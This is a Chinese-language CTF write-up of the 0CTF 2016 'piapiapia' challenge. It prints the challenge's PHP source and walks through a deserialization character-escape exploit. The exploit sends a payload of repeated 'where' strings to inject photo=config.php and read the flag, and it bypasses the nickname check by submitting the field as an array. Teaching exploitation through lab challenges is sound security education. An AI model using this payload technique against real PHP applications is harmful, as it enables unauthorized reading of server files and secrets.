CTF²-[0CTF 2016]piapiapia
|
文章
|
141

857 字
|
27 分钟
本文最后更新于24 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com

看到一个登录框,试一下sql注入,尝试无果开始扫目录

看一眼robots.txt,

没东西,接着试了下www.zip拿到源码

快速浏览一遍得知flag在config.php里面,这题应该是要文件读取config.php

注意到profile.php中含有file_get_contents()

//profile.php
<?php  
	require_once('class.php');     //内部有代码会用到class.php的函数
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	$username = $_SESSION['username'];
	$profile=$user->show_profile($username);
	if($profile  == null) {
		header('Location: update.php');
	}
	else {
		$profile=unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));   //出现file_get_contents()
?>
<!DOCTYPE html>
<html>
<head>
   <title>Profile</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
	<div class="container" style="margin-top:100px">  
		<img src="data:image/gif;base64,<?php echo $photo; ?>" class="img-memeda " style="width:180px;margin:0px auto;">
		<h3>Hi <?php echo $nickname;?></h3>
		<label>Phone: <?php echo $phone;?></label>
		<label>Email: <?php echo $email;?></label>
	</div>
</body>
</html>
<?php
	}
?>

看一下$profile[‘photo’]是从哪里来的

$profile=$user->show_profile($username); $profile=unserialize($profile);

开头有个require_once(‘class.php’); ,我们去class.php看看show_profile()是怎么定义的

//class.php
<?php
require('config.php');

class user extends mysql{
	private $table = 'users';

	public function is_exists($username) {
		$username = parent::filter($username);

		$where = "username = '$username'";
		return parent::select($this->table, $where);
	}
	public function register($username, $password) {
		$username = parent::filter($username);
		$password = parent::filter($password);

		$key_list = Array('username', 'password');
		$value_list = Array($username, md5($password));
		return parent::insert($this->table, $key_list, $value_list);
	}
	public function login($username, $password) {
		$username = parent::filter($username);
		$password = parent::filter($password);

		$where = "username = '$username'";
		$object = parent::select($this->table, $where);
		if ($object && $object->password === md5($password)) {
			return true;
		} else {
			return false;
		}
	}
	public function show_profile($username) {       //ciallo,在这里
		$username = parent::filter($username);    //filter在下面mysql定义了

		$where = "username = '$username'";
		$object = parent::select($this->table, $where);     //select也在下面定义
		return $object->profile;
	}
	public function update_profile($username, $new_profile) {
		$username = parent::filter($username);
		$new_profile = parent::filter($new_profile);

		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where);
	}
	public function __tostring() {
		return __class__;
	}
}

class mysql {
	private $link = null;

	public function connect($config) {
		$this->link = mysql_connect(
			$config['hostname'],
			$config['username'], 
			$config['password']
		);
		mysql_select_db($config['database']);
		mysql_query("SET sql_mode='strict_all_tables'");

		return $this->link;
	}

	public function select($table, $where, $ret = '*') {
		$sql = "SELECT $ret FROM $table WHERE $where";
		$result = mysql_query($sql, $this->link);
		return mysql_fetch_object($result);
	}

	public function insert($table, $key_list, $value_list) {
		$key = implode(',', $key_list);
		$value = '\'' . implode('\',\'', $value_list) . '\''; 
		$sql = "INSERT INTO $table ($key) VALUES ($value)";
		return mysql_query($sql);
	}

	public function update($table, $key, $value, $where) {
		$sql = "UPDATE $table SET $key = '$value' WHERE $where";
		return mysql_query($sql);
	}

	public function filter($string) {                   
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
	public function __tostring() {
		return __class__;
	}
}
session_start();
$user = new user();
$user->connect($config);

filter()select()在mysql中定义了,select会去找到username = '$username' 的profile数组,而filter会把profile当中的’select’, ‘insert’, ‘update’, ‘delete’, ‘where’全部转换成’hacker’需要注意的是‘where’转’hacker’是5个字符转6字符,为反序列化字符逃逸留下了空间

我们接着看profile是如何上传的,看到update.php

//update.php
<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {    //传入四个值

		$username = $_SESSION['username'];   
		if(!preg_match('/^\d{11}$/', $_POST['phone']))                      //匹配11位的号码
			die('Invalid phone');

		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email'])) //匹配邮箱格式
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10) 
                                                            //只能由字母和数字组成并且长度不得超过10但是可以通过传入数组来绕过
			die('Invalid nickname');

		$file = $_FILES['photo'];     
		if($file['size'] < 5 or $file['size'] > 1000000)       //photo的大小不能小于5或者大于1000000
			die('Photo size error');

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);

		$user->update_profile($username, serialize($profile));      //这里将序列化的profile所有数据序列化后传到数据库
		echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
	}
	else {
?>
<!DOCTYPE html>
<html>
<head>
   <title>UPDATE</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
	<div class="container" style="margin-top:100px">  
		<form action="update.php" method="post" enctype="multipart/form-data" class="well" style="width:220px;margin:0px auto;"> 
			<img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
			<h3>Please Update Your Profile</h3>
			<label>Phone:</label>
			<input type="text" name="phone" style="height:30px"class="span3"/>
			<label>Email:</label>
			<input type="text" name="email" style="height:30px"class="span3"/>
			<label>Nickname:</label>
			<input type="text" name="nickname" style="height:30px" class="span3">
			<label for="file">Photo:</label>
			<input type="file" name="photo" style="height:30px"class="span3"/>
			<button type="submit" class="btn btn-primary">UPDATE</button>
		</form>
	</div>
</body>
</html>
<?php
	}
?>

$user->update_profile($username, serialize($profile)); 上传的核心代码是这样,回看到class.php,发现这里是先将数据序列化然后经过filter(),再传回数据库,这里就存在反序列化字符逃逸的空间,我们这里先看一下正常的序列化结果:

<?php
$profile['phone'] = "12345678990";
$profile['email'] = "4321@qq.com";
$profile['nickname'] = "123";
$profile['photo'] = 'upload/' . md5("abc.jpg");

echo serialize($profile);

输出:a:4:{s:5:"phone";s:11:"12345678990";s:5:"email";s:11:"4321@qq.com";s:8:"nickname";s:3:"123";s:5:"photo";s:39:"upload/75639d4112bb5a157b65bb18136ccd4e";}

我们需要photo的值为config.php,所以构造

<?php
$profile['phone'] = "12345678990";
$profile['email'] = "4321@qq.com";
$profile['nickname'] = "123";
$profile['photo'] = "config.php";

echo serialize($profile);

结果:a:4:{s:5:"phone";s:11:"12345678990";s:5:"email";s:11:"4321@qq.com";s:8:"nickname";s:3:"123";s:5:"photo";s:10:"config.php";}

那么nickname的末尾一定是";s:5:"photo";s:10:"config.php";} 这样的,我们看一下这段代码的长度,了解我们要补多长进去echo strlen('";s:5:"photo";s:10:"config.php";}'); 结果是33,所以nickname要有33个where,

<?php
$profile['phone'] = "12345678990";
$profile['email'] = "4321@qq.com";
$profile['nickname'] = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";s:5:"photo";s:10:"config.php";}';
$profile['photo'] = 'upload/' . md5("abc.jpg");

echo serialize($profile);

输出:-省略-21@qq.com";s:8:"nickname";s:198:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";s:5:"photo";s:10:"config.php";}";s:5:"photo";s:39:"upload/75639d4-省略-

把这个结果经过filter()后33个where变成33个hacker,刚好是198个字符,后面的;s:5:"photo";s:10:"config.php";}就逃逸了出来,在反序列化后就会让photo的值变成config.php

构造好后,我们来做题,先进入/register.php随便注册一个用户admin,123

然后登录

传入数据后抓包,改nickname为nickname[]然后传入构造的payload:wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";s:5:"photo";s:10:"config.php";}但是这样又不行了,因为数组的序列化和字符串的不一样

<?php
$profile['phone'] = "12345678990";
$profile['email'] = "4321@qq.com";
$profile['nickname'][] = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";s:5:"photo";s:10:"config.php";}';
$profile['photo'] = 'upload/' . md5("abc.jpg");

echo serialize($profile);

输出a:4:{s:5:"phone";s:11:"12345678990";s:5:"email";s:11:"4321@qq.com";s:8:"nickname";a:1:{i:0;s:198:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:39:"upload/75639d4112bb5a157b65bb18136ccd4e";}

数组的末尾会多一个},所以这里要有34个where,同时补上},构造为wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

序列化后得到-省略-21@qq.com";s:8:"nickname";a:1:{i:0;s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:39:"upload/75639-省略-

抓包,改nickname[],传payload,发包

见到hi,array就基本成功了

查看源码的照片,解base64得到flag

那么如果是长度缩短又如何反序列化字符逃逸呢,这里需要对profile中photo的值来处理了,可惜本题没有权限
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																

							
							
						

																

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
使用SET做钓鱼网站的尝试

							
							

							
buuctf-[GXYCTF2019]禁止套娃

							
							

							
buuctf-[安洵杯 2019]easy_web

							
							

							
buuctf-[WUSTCTF2020]朴实无华

							
							

							
buuctf-[安洵杯 2019]easy_serialize_php

							
							

							
buuctf-[BJDCTF2020]Cookie is so stable

							
							

							
世界,您好!

							
							

							
buuctf-[MRCTF2020]Ezpop

							
							

							
[NCTF2019]Fake XML cookbook

							
							

							
buuctf-[BJDCTF2020]Mark loves cat